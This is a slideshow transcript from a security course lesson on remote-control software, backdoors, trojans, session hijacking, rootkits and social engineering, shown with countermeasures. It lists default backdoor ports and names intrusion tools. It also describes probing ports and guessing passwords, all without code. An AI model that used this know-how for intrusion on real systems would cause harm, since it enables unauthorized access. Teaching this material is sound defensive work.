remote control and advanced techniques l.
Skip this Video
Loading SlideShow in 5 Seconds..
Remote Control and Advanced Techniques PowerPoint Presentation
Download Presentation
Remote Control and Advanced Techniques

Loading in 2 Seconds...

play fullscreen
1 / 19

Remote Control and Advanced Techniques - PowerPoint PPT Presentation

  • Uploaded on

Remote Control and Advanced Techniques Lesson 17 Remote Control Software With global corporations, support personnel who can deal with computer problems may not always be on-site. They may use remote control software to allow them to provide support and maintenance from a central location.

I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
Download Presentation

PowerPoint Slideshow about 'Remote Control and Advanced Techniques' - adamdaniel

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
remote control software
Remote Control Software
  • With global corporations, support personnel who can deal with computer problems may not always be on-site. They may use remote control software to allow them to provide support and maintenance from a central location.
  • The problem is that the same software that can be used for useful purposes can be exploited, especially if misconfigured, by attackers to gain remote access and control of computers and networks.
  • Some new trojans designed to perform the same sort of functions as legitimate remote controls SW.
ports for some remote control sw
Ports for some Remote Control SW

Software TCP UDP

Citrix ICA 1494 1494

pcAnywhere 22, 5631, 65301 22, 5632

ReachOut 43188 None

Remotely Anywhere 2000,2001 None

Remotely Possible/

ControlIT 799, 800 800

Timbuktu 407 407

VNC 5800, 5801… None

5900, 5901…

Windows Term Server 3389 None

Radmin 4899 None

discovering rc software
Discovering RC Software
  • If an attacker finds one of these ports answering, they will try to exploit.
  • After default installation, many applications leave themselves open to accept connections from anywhere, possibly even without a username or password.
  • The easiest way to test for these is to simply attempt to connect to one of these ports.
    • Try enumeration techniques to obtain possible userids from which you can guess passwords
some sensible countermeasures
Some sensible countermeasures
  • Enable Passwords on your system
    • Too often this is left off, especially for dial up access where folks think “nobody knows about it, they would have to know the phone #.”
  • Enforce Strong passwords
    • If you’re going to use them, you might as well make them strong.
  • Force Alternate Authentication
    • You don’t have to rely on OS alone, can utilize additional authentication some packages provide
  • Encrypt Session Traffic
  • Limit Login Attempts
  • Log Failed Attempts
  • Lock Out Failed Users
  • Change Default Listen Port
virtual network computing
Virtual Network Computing
  • Originally developed at AT&T Labs.
  • Can be used with/by Windows, Linux, and Solaris platforms
  • Obtainable from
  • Has some vulnerabilities (big surprise)
    • Brute forcing VNC passwords
      • Weak passwords a possible problem as always
    • Network eavesdropping
      • By default, VNC does not use any sort of encryption after a user authenticates to the VNC server.
    • Weak WinVNC password obfuscation
      • Stores the server password in an obfuscated fashion that may allow an attacker to recover the cleartext server password.
microsoft terminal server
Microsoft Terminal Server
  • Terminal Server lets you deliver Windows-based applications, or the Windows desktop itself, to virtually any computing device—including those that cannot run Windows.
  • When users run an application on Terminal Server, the application execution takes place on the server, and only keyboard, mouse and display information is transmitted over the network. Users see only their own individual sessions, which are managed transparently by the server operating system, and remain independent of any other client session.
  • Windows 2000 Terminal Services remote administration mode is called "Remote Desktop for Administration" in Windows Server 2003, and has the ability to remote the actual console session of the server.
terminal server attacks
Terminal Server Attacks
  • Locating Terminal Server easy, uses port 3389.
    • Launch your own Terminal Server client then wait to be prompted for login ID/Password, normal attempts at guessing at this point.
  • ProbeTS, TSEnum are tools that will cycle through identified subnet attempting to locate Terminal Server
  • Some other attacks possible as well
    • RegAPI.DLL buffer overflow
    • Weak encryption that can lead to eavesdropping
    • Some possible user privilege elevation attacks
session hijacking
Session Hijacking
  • An attempt to “take over” an established session.
  • Some tools that can aid in this endeavor:
    • Hunt: first allows you to snoop, then insert commands into stream
  • Best countermeasure: encryption. If a person can’t view the traffic/session, it is hard to insert commands.
back doors
Back Doors
  • If an intruder gets into your system, count on them attempting to install some backdoors to allow them continued access, even if you find and eliminate their primary method.
    • Finding and clearing these can be a laborious task
  • Some common back doors:
    • Rogue user accounts
    • Startup files – even if you clean up, these can reinstall ways in
    • Scheduled jobs – similar to startup files, these will execute in future and will reinstall ways in
    • Remote Control program installation
back orifice and netbus
Back Orifice and Netbus
  • These both are very similar to some of the RC software packages (and are sometimes advertised in that fashion).
  • Original BO ran on Win 9x, BO2K added NT/2000.
  • NetBus, similar to BO, consists of two parts: a client-program ("netbus.exe") and a server-program often named: "patch.exe" (or "SysEdit.exe" with version 1.5x), which is the actual backdoor. Version 1.60 uses the TCP/UDP-Port # "12345" which can't be altered. From version 1.70 and higher the port can be configured.
  • BO2K also added some stealth capabilities and ability to customize it thus making it harder to detect.
remote control backdoor port numbers
Remote Control Backdoor Port Numbers

Default Default Altern.

Backdoor TCP UDP Ports

Remote.exe 135-139 135-139 No

Netcat Any Any Yes

Back Orifice NA 31337 Yes

Back Orifice 2000 54320 54321 Yes

NetBus 12345 NA Yes

Masters Paradise 40421


40426 NA Yes

  • “A Trojan horse is a program that purports to be a useful software tool, but it actually performs unintended (and often unauthorized) actions, or installs malicious or damaging software behind the scenes when launched.”
  • Key to Trojans is that you have to have somebody on the system run the Trojan in order for it to do its nefarious task.
  • Two implications for us
    • When doing an assessment, does the organization we are working with have Trojans installed? Is the environment such that it is likely they could be?
    • Can we use a Trojan to further our testing goals?
whack a mole
  • An example of a program that installed NetBus server while allowing you to play a game.
  • Figure pg. 581 McClure et al.
secure shell ssh attacks
Secure Shell (SSH) Attacks
  • SSH is a secure protocol used in place of programs such as telnet to conduct protected remote interactive communications.
  • Pretty good tool, but is vulnerable to a couple things:
    • Traffic analysis. Program exists that allows you to determine the length of a password or command sent.
    • Man-in-the-middle attack. Requires that you be able to replace public key used by host and that you are able to control DNS.
  • Once a system has been subverted, a rootkit is often one of the first things downloaded and installed.
  • Generally will include
    • Trojanized versions of common programs
    • Back doors (as discussed previously)
    • Sniffers
    • System Log cleaners
  • Imaging the system (creating mirror image of system volumes) also sometimes accomplished when access obtained.
    • Useful in circumventing security tools that utilize system states or details such as checksums.
social engineering
Social Engineering
  • “Clueless User” vs. the Help Desk
  • “Help Desk” vs. the Clueless User
  • Countermeasures
    • Limit data leakage through web sites, public databases, …
    • Formulate a strict policy for internal and external technical support procedures
    • Be paranoid about remote access
    • Craft outbound firewall and router access controls just as carefully as inbound
    • Use email safely
    • Educate employees on the basics of a secure environment (and on social engineering)
  • What is the importance and significance of this material?
    • Remote Control software is more prevalent and is a tremendous security concern.
  • How does this topic fit into the subject of “Security Risk Analysis”?
    • We need to know about the different packages that could be installed and that the organization we are testing might not know about.
report from teams
Report from Teams
  • Another possible assessment.
  • So, how’d it go?